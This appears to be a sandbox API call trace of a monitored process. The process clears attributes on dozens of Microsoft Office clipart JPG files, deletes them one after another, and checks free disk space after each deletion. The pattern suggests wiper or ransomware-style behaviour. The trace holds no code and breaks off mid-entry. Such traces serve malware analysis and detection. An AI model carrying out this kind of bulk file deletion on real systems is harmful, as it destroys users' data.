1 [0067.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG", dwFileAttributes=0x80) returned 1 [0067.893] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341328.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341328.jpg")) returned 1 [0067.896] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG", dwFileAttributes=0x80) returned 1 [0067.901] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341344.jpg")) returned 1 [0067.903] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.909] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG", dwFileAttributes=0x80) returned 1 [0067.909] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341439.jpg")) returned 1 [0067.912] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.917] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG", dwFileAttributes=0x80) returned 1 [0067.917] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341447.jpg")) returned 1 [0067.920] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG", dwFileAttributes=0x80) returned 1 [0067.925] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341448.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341448.jpg")) returned 1 [0067.929] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG", dwFileAttributes=0x80) returned 1 [0067.935] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341455.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341455.jpg")) returned 1 [0067.938] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG", dwFileAttributes=0x80) returned 1 [0067.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341475.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341475.jpg")) returned 1 [0067.947] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.955] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG", dwFileAttributes=0x80) returned 1 [0067.955] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341499.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341499.jpg")) returned 1 [0067.958] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.962] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG", dwFileAttributes=0x80) returned 1 [0067.962] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341534.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341534.jpg")) returned 1 [0067.972] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG", dwFileAttributes=0x80) returned 1 [0067.981] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341551.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341551.jpg")) returned 1 [0067.984] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG", dwFileAttributes=0x80) returned 1 [0067.990] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341554.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341554.jpg")) returned 1 [0067.993] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0067.999] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG", dwFileAttributes=0x80) returned 1 [0067.999] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341557.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341557.jpg")) returned 1 [0068.001] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.007] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG", dwFileAttributes=0x80) returned 1 [0068.007] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341559.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341559.jpg")) returned 1 [0068.010] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG", dwFileAttributes=0x80) returned 1 [0068.017] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341561.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341561.jpg")) returned 1 [0068.020] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG", dwFileAttributes=0x80) returned 1 [0068.025] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341634.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341634.jpg")) returned 1 [0068.029] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG", dwFileAttributes=0x80) returned 1 [0068.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341636.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341636.jpg")) returned 1 [0068.037] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG", dwFileAttributes=0x80) returned 1 [0068.042] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341645.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341645.jpg")) returned 1 [0068.044] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.049] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG", dwFileAttributes=0x80) returned 1 [0068.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341653.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341653.jpg")) returned 1 [0068.052] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG", dwFileAttributes=0x80) returned 1 [0068.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341654.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341654.jpg")) returned 1 [0068.060] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.066] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG", dwFileAttributes=0x80) returned 1 [0068.066] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341738.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341738.jpg")) returned 1 [0068.069] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.075] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG", dwFileAttributes=0x80) returned 1 [0068.075] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341742.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341742.jpg")) returned 1 [0068.080] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.090] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG", dwFileAttributes=0x80) returned 1 [0068.090] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382836.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382836.jpg")) returned 1 [0068.093] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG", dwFileAttributes=0x80) returned 1 [0068.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382925.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382925.jpg")) returned 1 [0068.107] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG", dwFileAttributes=0x80) returned 1 [0068.117] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382926.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382926.jpg")) returned 1 [0068.120] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG", dwFileAttributes=0x80) returned 1 [0068.181] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382927.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382927.jpg")) returned 1 [0068.185] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG", dwFileAttributes=0x80) returned 1 [0068.195] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382930.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382930.jpg")) returned 1 [0068.198] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.211] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG", dwFileAttributes=0x80) returned 1 [0068.211] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382931.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382931.jpg")) returned 1 [0068.216] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG", dwFileAttributes=0x80) returned 1 [0068.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382938.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382938.jpg")) returned 1 [0068.231] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.243] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG", dwFileAttributes=0x80) returned 1 [0068.244] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382939.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382939.jpg")) returned 1 [0068.247] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.256] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG", dwFileAttributes=0x80) returned 1 [0068.257] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382942.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382942.jpg")) returned 1 [0068.260] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.268] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG", dwFileAttributes=0x80) returned 1 [0068.269] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382944.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382944.jpg")) returned 1 [0068.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.281] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG", dwFileAttributes=0x80) returned 1 [0068.281] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382947.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382947.jpg")) returned 1 [0068.284] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG", dwFileAttributes=0x80) returned 1 [0068.295] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382948.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382948.jpg")) returned 1 [0068.299] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG", dwFileAttributes=0x80) returned 1 [0068.308] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382950.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382950.jpg")) returned 1 [0068.311] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.323] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG", dwFileAttributes=0x80) returned 1 [0068.323] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382952.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382952.jpg")) returned 1 [0068.326] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.336] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG", dwFileAttributes=0x80) returned 1 [0068.336] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382954.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382954.jpg")) returned 1 [0068.339] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.348] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG", dwFileAttributes=0x80) returned 1 [0068.348] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382955.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382955.jpg")) returned 1 [0068.351] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.361] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG", dwFileAttributes=0x80) returned 1 [0068.361] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382957.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382957.jpg")) returned 1 [0068.364] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.374] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG", dwFileAttributes=0x80) returned 1 [0068.374] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382958.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0382958.jpg")) returned 1 [0068.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0068.386] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0382959.JPG", dwFileAttributes=0x80) returned 1 [0068.387] DeleteFileW 